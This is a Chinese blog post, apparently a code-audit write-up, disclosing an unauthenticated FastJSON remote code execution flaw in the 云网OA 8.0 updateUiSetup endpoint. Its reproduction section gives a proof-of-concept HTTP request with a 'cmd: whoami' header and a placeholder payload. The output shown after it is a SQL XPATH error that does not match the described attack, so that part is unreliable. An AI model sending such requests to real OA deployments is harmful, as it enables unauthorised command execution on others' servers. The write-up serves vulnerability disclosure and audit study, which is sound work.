当前位置：首页 > 代码审计 > Java > 正文内容

云网OA8.0 updateUiSetup接口存在未授权FastJSON RCE

UzJu3个月前 (07-12)Java181

云网OA8.0 updateUiSetup接口存在未授权FastJSON RCE

基本信息

Gitee地址：https://gitee.com/bestfeng/oa_git_free
部署文档：http://partner.yimihome.com/static/index.html#/index/idea_deploy8

功能点

src/main/java/com/cloudweb/oa/controller/ApplicationController.java

低版本FastJSON

为什么会存在未授权，因为Filter的配置，这个oa，对于filter chain有点多，有基于spring security，也有原生的Dofilter，感觉偶尔的Chain会乱

这里不登录也是可以访问的

漏洞复现

POST /oa/setup/updateUiSetup?applicationCode=1&uiSetup=payloadHTTP/1.1
Host: 127.0.0.1:8880
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Priority: u=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 18
cmd:whoami

扫描二维码推送至手机访问。

SQL ERROR: ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

本文链接：https://uzzju.com/post/86.java

分享给朋友：

返回列表

上一篇：泛微E-Cology9 getFileViewUrl SSRF漏洞分析

下一篇：Nacos RCE漏洞分析

[入门]SpringBoot-MyBatis-luckwheel-master开源代码审计

环境搭建Github地址: GitHub - s6056826/luckwheel: 国产开源幸运大转盘管理系统，积分，倍率，奖品兑换CSDN介绍地址: 开源大转盘抽奖源码，带后台管理，可管理奖品和奖品中奖概率，java语言实现飞吧菜鸟了的...

【学习】某OA代码审计笔记

环境搭建Windows搭建推荐使用Windows搭建，因为idea搭建很麻烦，而且报错特别多，Windows是一键部署一键安装，安装好了之后会提示系统已经到期了，去setup看一眼到6月1号，不过没事，这里改系统时间就可以了成功登录...

JSP后门分析

环境部署首先启动一个tomcat的环境先把这里的代码跑起来，访问tomcat在docker中的tomcat/conf中可以看到账号密码将JSP打包为war包 jar -cvf 1.war 1.jsp 随后上传就部署好了静态代码分析大...

洞态IAST检测优化：阿里QLExpress组件表达式注入

1...

洞态IAST检测优化：Fel表达式注入

一、简介　Fel是开放的，引擎执行中的多个模块都可以扩展或替换。Fel的执行主要是通过函数实现,运算符(+、-等都是Fel函数），所有这些函数都是可以替换的，扩展函数也非常简单。 Fel有双引擎，同时支持解释执行和编译执行。可以根据...

泛微E-Cology9 getFileViewUrl SSRF漏洞分析

漏洞描述泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微E-Cology getFileV...

UzzzzZ

云网OA8.0 updateUiSetup接口存在未授权FastJSON RCE

云网OA8.0 updateUiSetup接口存在未授权FastJSON RCE

基本信息

功能点

漏洞复现

相关文章